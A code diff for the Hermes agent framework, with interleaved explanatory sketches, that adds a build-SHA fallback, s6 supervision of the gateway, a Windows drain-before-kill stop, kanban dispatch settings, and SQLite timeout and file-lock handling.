@@ -20,7 +20,15 @@ from agent.skill_utils import is_excluded_skill_path
def _get_git_commit(project_root: Path) -> str:
"""Return short git commit hash, or '(unknown)'."""
"""Return short git commit hash, or '(unknown)'.
Source installs and dev images resolve this live via ``git rev-parse``.
The published Docker image excludes ``.git`` from the build context, so
that lookup always fails; we fall back to the baked-in build SHA written
to ``<project_root>/.hermes_build_sha`` by the Dockerfile's
``HERMES_GIT_SHA`` build-arg (see ``hermes_cli/build_info.py``).
The output format is identical regardless of source.
"""
try:
result = subprocess.run(
["git", "rev-parse", "--short=8", "HEAD"],
@@ -28,9 +36,23 @@ def _get_git_commit(project_root: Path) -> str:
cwd=str(project_root),
)
if result.returncode == 0:
return result.stdout.strip()
value = result.stdout.strip()
if value:
return value
except Exception:
pass
# Fall back to the build-time baked SHA (populated in published Docker
# images, absent otherwise). Defers the import so the dump module
# stays cheap on non-dump code paths.
try:
from hermes_cli.build_info import get_build_sha
baked = get_build_sha(short=8)
if baked:
return baked
except Exception:
pass
return "(unknown)"
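The lookup order in `_get_git_commit` (live git, then baked SHA, then `(unknown)`) can be sketched without a repository. This is an illustration under stated assumptions: `read_baked_sha` is a hypothetical stand-in for `get_build_sha`, whose real implementation is not shown in this diff, and `git_lookup` is an injected callable used here so the chain can be tested without running `git`.

```python
from pathlib import Path
from typing import Callable, Optional

BUILD_SHA_FILENAME = ".hermes_build_sha"  # file name taken from the docstring


def read_baked_sha(project_root: Path, short: int = 8) -> Optional[str]:
    """Hypothetical stand-in for ``get_build_sha``: read and truncate the SHA."""
    try:
        value = (project_root / BUILD_SHA_FILENAME).read_text(encoding="utf-8").strip()
    except OSError:
        return None
    return value[:short] or None


def resolve_commit(project_root: Path, git_lookup: Callable[[Path], str]) -> str:
    """Try the live lookup first, then the baked file, then '(unknown)'."""
    try:
        live = git_lookup(project_root).strip()
        if live:  # an empty result counts as a miss, as in the diff
            return live
    except Exception:
        pass
    return read_baked_sha(project_root) or "(unknown)"
```

Treating an empty `git` output as a miss matters: a zero return code with blank stdout would otherwise short-circuit the fallback.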
@@ -279,7 +301,6 @@ def run_dump(args):
("DASHSCOPE_API_KEY", "dashscope"),
("HF_TOKEN", "huggingface"),
("NVIDIA_API_KEY", "nvidia"),
("AI_GATEWAY_API_KEY", "ai_gateway"),
("OPENCODE_ZEN_API_KEY", "opencode_zen"),
("OPENCODE_GO_API_KEY", "opencode_go"),
("KILOCODE_API_KEY", "kilocode"),
+72
@@ -5150,11 +5150,83 @@ def gateway_command(args):
sys.exit(1)
def _maybe_redirect_run_to_s6_supervision(args) -> bool:
"""Inside an s6 container, redirect bare ``gateway run`` to the
supervised path.
Background. Before the s6 image landed, ``docker run <image> gateway
run`` was the standard way to start a containerized gateway: the
gateway was the container's main process, tini reaped zombies, and
container exit code == gateway exit code. With s6-overlay as PID 1,
we'd much rather have the gateway run as a supervised s6 longrun
(auto-restart on crash, dashboard supervised alongside, multiple
profile gateways under the same /init). This redirect upgrades the
old invocation transparently: the user gets the new behavior
without changing their docker run command.
Three gates make this a no-op outside the intended scope:
1. ``_dispatch_via_service_manager_if_s6`` returns False unless
we're in a container with s6 as PID 1. Host runs of
``hermes gateway run`` are unaffected.
2. ``HERMES_S6_SUPERVISED_CHILD`` is exported by
``S6ServiceManager._render_run_script`` for the supervised
process itself, i.e. when s6-supervise execs ``hermes gateway
run --replace`` as a longrun, this guard short-circuits the
redirect so the supervised gateway actually runs in
foreground (otherwise we'd recurse: run → start → run → start
...).
3. ``--no-supervise`` (or ``HERMES_GATEWAY_NO_SUPERVISE=1``) opts
out for users who genuinely want pre-s6 semantics (CI smoke
tests, debugging the foreground startup path, etc.).
Returns True iff dispatched (caller should ``return``).
"""
no_supervise = getattr(args, "no_supervise", False) or \
os.environ.get("HERMES_GATEWAY_NO_SUPERVISE", "").lower() in ("1", "true", "yes")
if no_supervise:
return False
if os.environ.get("HERMES_S6_SUPERVISED_CHILD"):
# We ARE the supervised child that s6-supervise is running. Fall
# through to the foreground code path so the gateway actually
# starts.
return False
if not _dispatch_via_service_manager_if_s6("start"):
return False
# Loud breadcrumb: explain the upgrade and how to opt out. Print to
# stderr so it doesn't pollute stdout-parsing scripts. The
# supervised gateway's own logs are routed by s6-log to both
# `docker logs` and ${HERMES_HOME}/logs/gateways/<profile>/current,
# so the user sees a clear sequence: this banner first, then the
# gateway's own stdout/stderr from the supervisor.
print(
"→ gateway is now running under s6 supervision (auto-restart on crash,\n"
" dashboard supervised alongside if HERMES_DASHBOARD is set).\n"
" This is the recommended setup for the s6 container image — the\n"
" gateway will keep running even if it crashes.\n"
" Use `--no-supervise` (or HERMES_GATEWAY_NO_SUPERVISE=1) to opt out\n"
" and get the pre-s6 foreground behavior instead.",
file=sys.stderr,
flush=True,
)
# Block until the container is signalled. The supervised gateway's
# lifetime is independent of this process — s6-supervise restarts
# it on crash, and we don't want the container to exit when the
# gateway flaps. `sleep infinity` matches the static main-hermes
# service's pattern (see docker/s6-rc.d/main-hermes/run): the CMD
# process is a no-op heartbeat that keeps /init alive until
# `docker stop` sends SIGTERM, at which point /init runs stage 3
# shutdown (which tears down the supervised gateway cleanly).
os.execvp("sleep", ["sleep", "infinity"])
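The three gates can be read as a pure decision function. The sketch below is an assumption-laden simplification: `should_redirect_to_s6` and its `s6_is_pid1` argument are hypothetical, and in the real code the third gate is not a plain boolean but the return value of `_dispatch_via_service_manager_if_s6("start")`, which also performs the dispatch.

```python
from typing import Mapping

_TRUTHY = ("1", "true", "yes")


def should_redirect_to_s6(
    no_supervise_flag: bool,
    env: Mapping[str, str],
    s6_is_pid1: bool,
) -> bool:
    """Return True only when a bare ``gateway run`` should be redirected."""
    # Gate 3 in the docstring: explicit opt-out via flag or environment.
    if no_supervise_flag or env.get("HERMES_GATEWAY_NO_SUPERVISE", "").lower() in _TRUTHY:
        return False
    # Gate 2: the supervised child must run in the foreground, otherwise
    # run -> start -> run would recurse.
    if env.get("HERMES_S6_SUPERVISED_CHILD"):
        return False
    # Gate 1: only redirect inside a container with s6 as PID 1.
    return s6_is_pid1
```

Checking the opt-out and the child marker before the s6 probe mirrors the order in the diff, so neither case ever triggers a service-manager call.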
def _gateway_command_inner(args):
subcmd = getattr(args, 'gateway_command', None)
# Default to run if no subcommand
if subcmd is None or subcmd == "run":
if _maybe_redirect_run_to_s6_supervision(args):
return # unreachable; execvp doesn't return
verbose = getattr(args, 'verbose', 0)
quiet = getattr(args, 'quiet', False)
replace = getattr(args, 'replace', False)
+72 -7
@@ -1014,12 +1014,70 @@ def start() -> None:
_report_gateway_start(f"direct spawn (PID {pid})")
def stop() -> None:
"""Stop the gateway. Tries /End on the scheduled task, then kills any stragglers."""
_assert_windows()
from hermes_cli.gateway import kill_gateway_processes
def _drain_gateway_pid(pid: int, drain_timeout: float) -> bool:
"""Write the planned-stop marker and wait for the gateway PID to exit.
stopped_any = False
Windows cannot deliver POSIX signals to a Python asyncio loop
(``loop.add_signal_handler`` raises NotImplementedError), so writing
the marker is the ONLY way to ask a running gateway to drain
in-flight agents and persist ``resume_pending`` before exit. The
gateway's planned-stop watcher thread (gateway/run.py) polls for
the marker and drives the same shutdown path the SIGTERM handler
would have on POSIX.
Returns True if the PID exited within the timeout, False if it
didn't (caller should escalate to schtasks /End + taskkill).
"""
if pid <= 0:
return False
try:
from gateway.status import write_planned_stop_marker, _pid_exists
except ImportError:
return False
try:
write_planned_stop_marker(pid)
except Exception:
# Best-effort: if the marker can't be written, we have no choice
# but to fall through to a hard kill. Caller decides escalation.
pass
deadline = time.monotonic() + max(drain_timeout, 1.0)
while time.monotonic() < deadline:
if not _pid_exists(pid):
return True
time.sleep(0.5)
return False
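The wait loop in `_drain_gateway_pid` is a deadline poll on a monotonic clock. A minimal sketch of that pattern follows, assuming injectable `clock` and `sleep` callables (both hypothetical, added here so the loop can be tested without real delays); the one-second floor and the 0.5-second poll interval are taken from the diff.

```python
import time
from typing import Callable


def wait_for_exit(
    pid_exists: Callable[[], bool],
    timeout: float,
    poll_interval: float = 0.5,
    clock: Callable[[], float] = time.monotonic,
    sleep: Callable[[float], None] = time.sleep,
) -> bool:
    """Poll until the process is gone or the deadline passes.

    Returns True if the process exited in time, False if the caller
    should escalate to a hard kill.
    """
    # The floor of 1.0 s guarantees at least a couple of polls even when
    # the configured timeout is zero or negative.
    deadline = clock() + max(timeout, 1.0)
    while clock() < deadline:
        if not pid_exists():
            return True
        sleep(poll_interval)
    return False
```

Using a monotonic clock keeps the deadline stable if the wall clock is adjusted while the gateway is draining.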
def stop() -> None:
"""Stop the gateway.
Writes the planned-stop marker first so the gateway can drain
in-flight agents and persist ``resume_pending`` before exit (the
gateway's marker-watcher thread picks this up — Windows asyncio
can't deliver SIGTERM to the loop, so the marker is our only IPC).
Then escalates: ``schtasks /End`` (kills the scheduled-task tree)
+ ``kill_gateway_processes(force=True)`` for any strays.
"""
_assert_windows()
from hermes_cli.gateway import kill_gateway_processes, _get_restart_drain_timeout
from gateway.status import get_running_pid
# Phase 1: ask the running gateway (if any) to drain itself by writing
# the planned-stop marker, then wait briefly for it to exit cleanly.
# On clean exit, sessions land with resume_pending=True and the next
# boot will auto-resume them.
pid = get_running_pid()
drained = False
if pid is not None:
try:
drain_timeout = float(_get_restart_drain_timeout() or 30.0)
except Exception:
drain_timeout = 30.0
drained = _drain_gateway_pid(pid, drain_timeout)
stopped_any = drained
if is_task_registered():
code, _out, err = _exec_schtasks(["/End", "/TN", get_task_name()])
# schtasks returns nonzero when the task isn't currently running — don't treat that as an error.
@@ -1028,12 +1086,19 @@ def stop() -> None:
elif "not running" not in (err or "").lower():
print(f"⚠ schtasks /End returned code {code}: {err.strip()}")
killed = kill_gateway_processes(all_profiles=False)
# Phase 3: hard-kill any strays. When drain succeeded this is a no-op;
# when drain timed out this is the escalation that ensures the PID
# actually exits. Use force=True on Windows so taskkill /T /F walks
# the descendant tree (browser helpers, etc.).
killed = kill_gateway_processes(all_profiles=False, force=not drained)
if killed:
stopped_any = True
print(f"✓ Killed {killed} gateway process(es)")
if stopped_any:
print("✓ Gateway stopped")
if drained:
print("✓ Gateway stopped (drained cleanly)")
else:
print("✓ Gateway stopped")
else:
print("✗ No gateway was running")
+73 -35
@@ -1021,7 +1021,7 @@ def _board_task_counts(slug: str) -> dict[str, int]:
path = kb.kanban_db_path(board=slug)
if not path.exists():
return {}
with kb.connect(board=slug) as conn:
with kb.connect_closing(board=slug) as conn:
rows = conn.execute(
"SELECT status, COUNT(*) AS n FROM tasks GROUP BY status"
).fetchall()
@@ -1264,7 +1264,7 @@ def _cmd_init(args: argparse.Namespace) -> int:
def _cmd_heartbeat(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.heartbeat_worker(
conn,
args.task_id,
@@ -1279,7 +1279,7 @@ def _cmd_heartbeat(args: argparse.Namespace) -> int:
def _cmd_assignees(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
data = kb.known_assignees(conn)
if getattr(args, "json", False):
print(json.dumps(data, indent=2, ensure_ascii=False))
@@ -1320,7 +1320,7 @@ def _cmd_create(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
task_id = kb.create_task(
conn,
title=args.title,
@@ -1369,7 +1369,7 @@ def _cmd_swarm(args: argparse.Namespace) -> int:
if not workers:
print("kanban swarm: at least one --worker is required", file=sys.stderr)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
created = ks.create_swarm(
conn,
goal=args.goal,
@@ -1395,7 +1395,7 @@ def _cmd_list(args: argparse.Namespace) -> int:
assignee = args.assignee
if args.mine and not assignee:
assignee = _profile_author()
with kb.connect() as conn:
with kb.connect_closing() as conn:
# Cheap "mini-dispatch": recompute ready so list output reflects
# dependencies that may have cleared since the last dispatcher tick.
kb.recompute_ready(conn)
@@ -1444,7 +1444,7 @@ def _cmd_show(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.get_task(conn, args.task_id)
if not task:
print(f"no such task: {args.task_id}", file=sys.stderr)
@@ -1610,7 +1610,7 @@ def _cmd_show(args: argparse.Namespace) -> int:
def _cmd_assign(args: argparse.Namespace) -> int:
profile = None if args.profile.lower() in {"none", "-", "null"} else args.profile
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.assign_task(conn, args.task_id, profile)
if not ok:
print(f"no such task: {args.task_id}", file=sys.stderr)
@@ -1620,7 +1620,7 @@ def _cmd_assign(args: argparse.Namespace) -> int:
def _cmd_reclaim(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.reclaim_task(
conn, args.task_id,
reason=getattr(args, "reason", None),
@@ -1637,7 +1637,7 @@ def _cmd_reclaim(args: argparse.Namespace) -> int:
def _cmd_reassign(args: argparse.Namespace) -> int:
profile = None if args.profile.lower() in {"none", "-", "null"} else args.profile
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.reassign_task(
conn, args.task_id, profile,
reclaim_first=bool(getattr(args, "reclaim", False)),
@@ -1667,7 +1667,7 @@ def _cmd_diagnostics(args: argparse.Namespace) -> int:
diag_config = kd.config_from_runtime_config(load_config())
with kb.connect() as conn:
with kb.connect_closing() as conn:
# Either one-task mode or fleet mode.
if getattr(args, "task", None):
task = kb.get_task(conn, args.task)
@@ -1790,14 +1790,14 @@ def _cmd_diagnostics(args: argparse.Namespace) -> int:
def _cmd_link(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
kb.link_tasks(conn, args.parent_id, args.child_id)
print(f"Linked {args.parent_id} -> {args.child_id}")
return 0
def _cmd_unlink(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.unlink_tasks(conn, args.parent_id, args.child_id)
if not ok:
print(f"No such link: {args.parent_id} -> {args.child_id}", file=sys.stderr)
@@ -1807,7 +1807,7 @@ def _cmd_unlink(args: argparse.Namespace) -> int:
def _cmd_claim(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
task = kb.claim_task(conn, args.task_id, ttl_seconds=args.ttl)
if task is None:
# Report why
@@ -1838,7 +1838,7 @@ def _cmd_comment(args: argparse.Namespace) -> int:
suffix = f"\n\n[trimmed to {args.max_len} chars by --max-len]"
body = body[: max(0, args.max_len - len(suffix))].rstrip() + suffix
author = args.author or _profile_author()
with kb.connect() as conn:
with kb.connect_closing() as conn:
kb.add_comment(conn, args.task_id, author, body)
print(f"Comment added to {args.task_id}")
return 0
@@ -1885,7 +1885,7 @@ def _cmd_complete(args: argparse.Namespace) -> int:
print(f"kanban: --metadata: {exc}", file=sys.stderr)
return 2
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if not kb.complete_task(
conn, tid,
@@ -1912,7 +1912,7 @@ def _cmd_edit(args: argparse.Namespace) -> int:
except (ValueError, json.JSONDecodeError) as exc:
print(f"kanban: --metadata: {exc}", file=sys.stderr)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
if not kb.edit_completed_task_result(
conn,
args.task_id,
@@ -1934,7 +1934,7 @@ def _cmd_block(args: argparse.Namespace) -> int:
author = _profile_author()
ids = [args.task_id] + list(getattr(args, "ids", None) or [])
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if reason:
kb.add_comment(conn, tid, author, f"BLOCKED: {reason}")
@@ -1956,7 +1956,7 @@ def _cmd_schedule(args: argparse.Namespace) -> int:
author = _profile_author()
ids = [args.task_id] + list(getattr(args, "ids", None) or [])
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if reason:
kb.add_comment(conn, tid, author, f"SCHEDULED: {reason}")
@@ -1979,7 +1979,7 @@ def _cmd_unblock(args: argparse.Namespace) -> int:
print("at least one task_id is required", file=sys.stderr)
return 1
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
if not kb.unblock_task(conn, tid):
failed.append(tid)
@@ -2003,7 +2003,7 @@ def _cmd_promote(args: argparse.Namespace) -> int:
seen.add(tid)
results: list[dict[str, object]] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
for tid in ids:
ok, err = kb.promote_task(
conn,
@@ -2050,7 +2050,7 @@ def _cmd_archive(args: argparse.Namespace) -> int:
print("at least one task_id is required", file=sys.stderr)
return 1
failed: list[str] = []
with kb.connect() as conn:
with kb.connect_closing() as conn:
if purge_ids:
for tid in purge_ids:
if not kb.delete_archived_task(conn, tid):
@@ -2073,7 +2073,7 @@ def _cmd_tail(args: argparse.Namespace) -> int:
print(f"Tailing events for {args.task_id}. Ctrl-C to stop.")
try:
while True:
with kb.connect() as conn:
with kb.connect_closing() as conn:
events = kb.list_events(conn, args.task_id)
for e in events:
if e.id > last_id:
@@ -2087,12 +2087,35 @@ def _cmd_tail(args: argparse.Namespace) -> int:
def _cmd_dispatch(args: argparse.Namespace) -> int:
with kb.connect() as conn:
# Honour kanban.default_assignee as the fallback for unassigned ready
# tasks (#27145) and kanban.max_in_progress_per_profile as the
# per-profile concurrency cap (#21582). Same semantics as the
# gateway dispatch path.
try:
from hermes_cli.config import load_config
_cfg = load_config()
_kanban_cfg = _cfg.get("kanban", {}) if isinstance(_cfg, dict) else {}
default_assignee = (_kanban_cfg.get("default_assignee") or "").strip() or None
_raw_per_profile = _kanban_cfg.get("max_in_progress_per_profile", None)
try:
max_in_progress_per_profile = (
int(_raw_per_profile) if _raw_per_profile is not None else None
)
if max_in_progress_per_profile is not None and max_in_progress_per_profile < 1:
max_in_progress_per_profile = None
except (TypeError, ValueError):
max_in_progress_per_profile = None
except Exception:
default_assignee = None
max_in_progress_per_profile = None
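The normalisation rules for the two settings are easier to see as a standalone function. This is a sketch, assuming a hypothetical helper name `parse_dispatch_settings`; the diff performs the same steps inline inside `_cmd_dispatch`.

```python
from typing import Any, Optional, Tuple


def parse_dispatch_settings(cfg: Any) -> Tuple[Optional[str], Optional[int]]:
    """Return (default_assignee, max_in_progress_per_profile) from a config."""
    try:
        kanban = cfg.get("kanban", {}) if isinstance(cfg, dict) else {}
        # Empty or whitespace-only assignee means "no fallback".
        assignee = (kanban.get("default_assignee") or "").strip() or None
        raw_cap = kanban.get("max_in_progress_per_profile")
        try:
            cap = int(raw_cap) if raw_cap is not None else None
            if cap is not None and cap < 1:
                cap = None  # zero or negative disables the cap
        except (TypeError, ValueError):
            cap = None  # non-numeric values disable the cap
        return assignee, cap
    except Exception:
        # Any malformed config shape disables both features.
        return None, None
```

Every failure path degrades to "feature off", so a broken config can never block dispatch or apply an unintended cap.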
with kb.connect_closing() as conn:
res = kb.dispatch_once(
conn,
dry_run=args.dry_run,
max_spawn=args.max,
failure_limit=getattr(args, "failure_limit", kb.DEFAULT_SPAWN_FAILURE_LIMIT),
default_assignee=default_assignee,
max_in_progress_per_profile=max_in_progress_per_profile,
)
if getattr(args, "json", False):
print(json.dumps({
@@ -2108,6 +2131,11 @@ def _cmd_dispatch(args: argparse.Namespace) -> int:
],
"skipped_unassigned": res.skipped_unassigned,
"skipped_nonspawnable": res.skipped_nonspawnable,
"skipped_per_profile_capped": [
{"task_id": tid, "assignee": who, "current": current}
for (tid, who, current) in res.skipped_per_profile_capped
],
"auto_assigned_default": res.auto_assigned_default,
}, indent=2))
return 0
print(f"Reclaimed: {res.reclaimed}")
@@ -2128,8 +2156,18 @@ def _cmd_dispatch(args: argparse.Namespace) -> int:
for tid, who, ws in res.spawned:
tag = " (dry)" if args.dry_run else ""
print(f" - {tid} -> {who} @ {ws or '-'}{tag}")
if res.auto_assigned_default:
print(
f"Auto-assigned to kanban.default_assignee={default_assignee!r}: "
f"{', '.join(res.auto_assigned_default)}"
)
if res.skipped_unassigned:
print(f"Skipped (unassigned): {', '.join(res.skipped_unassigned)}")
if res.skipped_per_profile_capped:
for tid, who, current in res.skipped_per_profile_capped:
print(
f"Deferred ({who} at per-profile cap, {current} running): {tid}"
)
if res.skipped_nonspawnable:
print(
f"Skipped (non-spawnable assignee — terminal lane, OK): "
@@ -2257,7 +2295,7 @@ def _cmd_daemon(args: argparse.Namespace) -> int:
from the dispatcher's perspective, not stuck.
"""
try:
with kb.connect() as conn:
with kb.connect_closing() as conn:
return kb.has_spawnable_ready(conn)
except Exception:
return False
@@ -2288,7 +2326,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
cursor = 0
print("Watching kanban events. Ctrl-C to stop.", flush=True)
# Seed cursor at the latest id so we don't replay history.
with kb.connect() as conn:
with kb.connect_closing() as conn:
row = conn.execute(
"SELECT COALESCE(MAX(id), 0) AS m FROM task_events"
).fetchone()
@@ -2296,7 +2334,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
try:
while True:
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = conn.execute(
"SELECT e.id, e.task_id, e.kind, e.payload, e.created_at, "
" t.assignee, t.tenant "
@@ -2329,7 +2367,7 @@ def _cmd_watch(args: argparse.Namespace) -> int:
def _cmd_stats(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
stats = kb.board_stats(conn)
if getattr(args, "json", False):
print(json.dumps(stats, indent=2, ensure_ascii=False))
@@ -2349,7 +2387,7 @@ def _cmd_stats(args: argparse.Namespace) -> int:
def _cmd_notify_subscribe(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
if kb.get_task(conn, args.task_id) is None:
print(f"no such task: {args.task_id}", file=sys.stderr)
return 1
@@ -2366,7 +2404,7 @@ def _cmd_notify_subscribe(args: argparse.Namespace) -> int:
def _cmd_notify_list(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
subs = kb.list_notify_subs(conn, args.task_id)
if getattr(args, "json", False):
print(json.dumps(subs, indent=2, ensure_ascii=False))
@@ -2383,7 +2421,7 @@ def _cmd_notify_list(args: argparse.Namespace) -> int:
def _cmd_notify_unsubscribe(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
ok = kb.remove_notify_sub(
conn, task_id=args.task_id,
platform=args.platform, chat_id=args.chat_id,
@@ -2417,7 +2455,7 @@ def _cmd_runs(args: argparse.Namespace) -> int:
file=sys.stderr,
)
return 2
with kb.connect() as conn:
with kb.connect_closing() as conn:
runs = kb.list_runs(conn, args.task_id, **rsk)
if getattr(args, "json", False):
print(json.dumps([
@@ -2456,7 +2494,7 @@ def _cmd_runs(args: argparse.Namespace) -> int:
def _cmd_context(args: argparse.Namespace) -> int:
with kb.connect() as conn:
with kb.connect_closing() as conn:
text = kb.build_worker_context(conn, args.task_id)
print(text)
return 0
@@ -2622,7 +2660,7 @@ def _cmd_gc(args: argparse.Namespace) -> int:
import shutil
scratch_root = kb.workspaces_root()
removed_ws = 0
with kb.connect() as conn:
with kb.connect_closing() as conn:
rows = conn.execute(
"SELECT id, workspace_kind, workspace_path FROM tasks WHERE status = 'archived'"
).fetchall()
@@ -2645,7 +2683,7 @@ def _cmd_gc(args: argparse.Namespace) -> int:
event_days = getattr(args, "event_retention_days", 30)
log_days = getattr(args, "log_retention_days", 30)
with kb.connect() as conn:
with kb.connect_closing() as conn:
removed_events = kb.gc_events(
conn, older_than_seconds=event_days * 24 * 3600,
)
+436 -98
@@ -71,6 +71,7 @@ new locking.
from __future__ import annotations
import contextlib
import hashlib
import json
import os
import re
@@ -134,6 +135,34 @@ def _resolve_claim_ttl_seconds(ttl_seconds: Optional[int] = None) -> int:
return DEFAULT_CLAIM_TTL_SECONDS
# Grace period after a task transitions to ``running`` during which
# ``detect_crashed_workers`` skips the ``_pid_alive`` check. Covers the
# fork() → /proc-visibility window where liveness can transiently report
# False for a freshly-spawned worker. The 15-minute claim TTL still
# catches genuinely-crashed workers; this only suppresses false positives
# during the launch window.
DEFAULT_CRASH_GRACE_SECONDS = 30
def _resolve_crash_grace_seconds() -> int:
"""Return the crash-detection grace period in seconds.
Reads ``HERMES_KANBAN_CRASH_GRACE_SECONDS`` from the environment;
falls back to ``DEFAULT_CRASH_GRACE_SECONDS`` when absent, empty,
non-integer, or negative. A value of 0 restores immediate-reclaim
behaviour (useful for tests).
"""
raw = os.environ.get("HERMES_KANBAN_CRASH_GRACE_SECONDS", "").strip()
if raw:
try:
parsed = int(raw)
except ValueError:
parsed = -1
if parsed >= 0:
return parsed
return DEFAULT_CRASH_GRACE_SECONDS
# Worker-context caps so build_worker_context() stays bounded on
# pathological boards (retry-heavy tasks, comment storms, giant
# summaries). Values chosen to fit a typical 100k-char LLM prompt with
@@ -954,6 +983,89 @@ CREATE INDEX IF NOT EXISTS idx_notify_task ON kanban_notify_subs(task_
_INITIALIZED_PATHS: set[str] = set()
_INIT_LOCK = threading.RLock()
_SQLITE_HEADER = b"SQLite format 3\x00"
DEFAULT_BUSY_TIMEOUT_MS = 120_000
def _resolve_busy_timeout_ms() -> int:
"""Return the SQLite busy timeout for Kanban connections.
Kanban is the shared cross-profile dispatch bus, so worker stampedes are
expected. A long busy timeout lets SQLite serialize writers via WAL rather
than surfacing transient ``database is locked`` failures during bursts.
"""
raw = os.environ.get("HERMES_KANBAN_BUSY_TIMEOUT_MS", "").strip()
if raw:
try:
parsed = int(raw)
except ValueError:
parsed = 0
if parsed > 0:
return parsed
return DEFAULT_BUSY_TIMEOUT_MS
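`_resolve_busy_timeout_ms` and `_resolve_crash_grace_seconds` share one pattern: read an integer from the environment and fall back to a default when it is absent, malformed, or below a floor. The sketch below captures that pattern with a hypothetical helper, `env_int`; the `env` parameter is also an assumption, added so the behaviour can be checked without touching the real environment.

```python
import os
from typing import Mapping, Optional


def env_int(
    name: str,
    default: int,
    minimum: int,
    env: Optional[Mapping[str, str]] = None,
) -> int:
    """Read an integer setting, falling back to ``default`` on bad input."""
    source = os.environ if env is None else env
    raw = source.get(name, "").strip()
    if raw:
        try:
            parsed = int(raw)
        except ValueError:
            return default
        if parsed >= minimum:
            return parsed
    return default
```

The two resolvers differ only in the floor: the crash grace period accepts 0 (immediate reclaim, useful for tests), while the busy timeout requires a strictly positive value, so `"0"` there falls back to the 120,000 ms default.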
def _sqlite_connect(path: Path) -> sqlite3.Connection:
"""Open a Kanban SQLite connection with consistent lock waiting."""
busy_timeout_ms = _resolve_busy_timeout_ms()
conn = sqlite3.connect(
str(path),
isolation_level=None,
timeout=busy_timeout_ms / 1000.0,
)
# ``sqlite3.connect(timeout=...)`` normally maps to busy_timeout, but set
# the PRAGMA explicitly so it is observable and survives future wrapper
# changes. Parameter binding is not supported for PRAGMA assignments.
conn.execute(f"PRAGMA busy_timeout={busy_timeout_ms}")
return conn
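The comment above says the explicit PRAGMA makes the timeout observable. A short sketch of what that means in practice, using only the standard `sqlite3` module: `open_with_busy_timeout` and `current_busy_timeout_ms` are hypothetical names, and the in-memory database in the usage is chosen purely for illustration.

```python
import sqlite3

BUSY_TIMEOUT_MS = 120_000  # default from the diff


def open_with_busy_timeout(path: str, busy_timeout_ms: int = BUSY_TIMEOUT_MS) -> sqlite3.Connection:
    """Open a connection and set the busy timeout both ways, as the diff does."""
    conn = sqlite3.connect(path, isolation_level=None, timeout=busy_timeout_ms / 1000.0)
    # PRAGMA assignments cannot take bound parameters, so coerce to int
    # before interpolating to keep the statement well-formed.
    conn.execute(f"PRAGMA busy_timeout={int(busy_timeout_ms)}")
    return conn


def current_busy_timeout_ms(conn: sqlite3.Connection) -> int:
    """Read the effective busy timeout back from SQLite."""
    return conn.execute("PRAGMA busy_timeout").fetchone()[0]
```

Reading the value back with `PRAGMA busy_timeout` gives tests and diagnostics a way to confirm the setting on a live connection rather than trusting the constructor argument.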
@contextlib.contextmanager
def _cross_process_init_lock(path: Path):
"""Serialize first-connect WAL/schema/integrity setup across processes.
``_INIT_LOCK`` only protects threads inside one Python process. During a
dispatcher burst, many worker processes can all hit a fresh/legacy board at
once and each process has an empty ``_INITIALIZED_PATHS`` cache. This file
lock keeps header validation, integrity probing, WAL activation, and
additive migrations single-file/single-writer across the whole host while
leaving normal post-init DB usage concurrent under SQLite WAL.
"""
path.parent.mkdir(parents=True, exist_ok=True)
lock_path = path.with_name(path.name + ".init.lock")
handle = lock_path.open("a+b")
try:
if _IS_WINDOWS:
import msvcrt
# Lock a single byte in the sidecar file. ``msvcrt.locking`` starts
# at the current file position, so seek explicitly before both
# lock and unlock. The file is opened in append/read binary mode so
# it always exists, but the byte-range lock is the synchronization
# primitive; no payload needs to be written.
handle.seek(0)
locking = getattr(msvcrt, "locking")
lock_mode = getattr(msvcrt, "LK_LOCK")
locking(handle.fileno(), lock_mode, 1)
else:
import fcntl
fcntl.flock(handle.fileno(), fcntl.LOCK_EX)
yield
finally:
try:
if _IS_WINDOWS:
import msvcrt
handle.seek(0)
locking = getattr(msvcrt, "locking")
unlock_mode = getattr(msvcrt, "LK_UNLCK")
locking(handle.fileno(), unlock_mode, 1)
else:
import fcntl
fcntl.flock(handle.fileno(), fcntl.LOCK_UN)
finally:
handle.close()
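For readers unfamiliar with sidecar file locks, the POSIX half of the pattern above can be sketched on its own. This is a simplified, POSIX-only illustration (it imports `fcntl`, so it will not run on Windows); `sidecar_lock` and `try_lock_nonblocking` are hypothetical names, not part of the module.

```python
import contextlib
import fcntl  # POSIX only
import tempfile
from pathlib import Path


@contextlib.contextmanager
def sidecar_lock(path: Path):
    """Hold an exclusive flock on '<name>.init.lock' next to ``path``."""
    lock_path = path.with_name(path.name + ".init.lock")
    with lock_path.open("a+b") as handle:
        fcntl.flock(handle.fileno(), fcntl.LOCK_EX)
        try:
            yield lock_path
        finally:
            fcntl.flock(handle.fileno(), fcntl.LOCK_UN)


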